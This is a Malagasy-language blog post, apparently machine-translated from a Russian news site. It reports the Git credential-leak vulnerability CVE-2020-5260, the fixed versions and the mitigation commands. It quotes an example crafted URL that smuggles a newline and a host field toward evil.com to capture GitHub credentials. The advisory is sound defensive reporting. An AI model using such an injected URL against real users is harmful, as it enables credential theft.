ProHoster > Blog > vaovao amin'ny Internet > Ny vulnerability leakage de credential Git

Ny vulnerability leakage de credential Git

MIVOAKA famoahana fanitsiana ny rafitra fanaraha-maso loharano mizara Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 ary 2.17.4, in izay nanafoana Fahamoram-pahavoazana (CVE-2020-5260) ao amin'ny mpandrindra"credential.helper", izay mahatonga ny fahazoan-dΓ lana halefa any amin'ny mpampiantrano diso rehefa misy mpanjifa git miditra amin'ny tahiry amin'ny alΓ lan'ny URL namboarina manokana misy endri-tsoratra vaovao. Ny vulnerability dia azo ampiasaina handaminana ny fahazoan-dΓ lana avy amin'ny mpampiantrano iray hafa halefa any amin'ny mpizara fehezin'ny mpanafika.

Rehefa mamaritra URL toy ny "https://evil.com?%0ahost=github.com/", ny mpitantana ny fahazoan-dΓ lana rehefa mifandray amin'ny mpampiantrano evil.com dia handalo ny mari-pamantarana fanamarinana voatondro ho an'ny github.com. Mitranga ny olana rehefa manao asa toy ny "git clone", ao anatin'izany ny fanodinana URL ho an'ny submodules (ohatra, ny "git submodule update" dia hamindra ho azy ireo URL voalaza ao amin'ny rakitra .gitmodules avy amin'ny tahiry). Ny vulnerability dia mampidi-doza indrindra amin'ny toe-javatra misy mpandrindra manangom-bokatra iray tsy mahita ny URL, ohatra, rehefa miasa miaraka amin'ny submodules, na amin'ny rafitra manao hetsika mandeha ho azy, ohatra, amin'ny scripts build.

Mba hanakanana ny vulnerability amin'ny dikan-teny vaovao voarara Mandalo endri-tsoratra vaovao amin'ny soatoavina rehetra alefa amin'ny alΓ lan'ny protocol fifanakalozana ara-dalΓ na. Ho an'ny fizarana dia azonao atao ny manara-maso ny famoahana ny fanavaozana fonosana amin'ny pejy Debian, Ubuntu, RHEL, SUSE/openSUSE, Fedora, andohalambo, FreeBSD.

Toy ny vahaolana hanakanana ny olana soso-kevitra Aza mampiasa credential.helper rehefa miditra amin'ny tahiry ho an'ny daholobe ary aza mampiasa "git clone" amin'ny fomba "--recurse-submodules" miaraka amin'ny tahiry tsy voamarika. Mba hanesorana tanteraka ny credential.helper handler, izay manao izany fiarovana ary maka ny tenimiafina avy amin'ny cache, voaaro trano fitahirizana na rakitra misy tenimiafina, azonao ampiasaina ny baiko:

git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper

Source: opennet.ru

Add a comment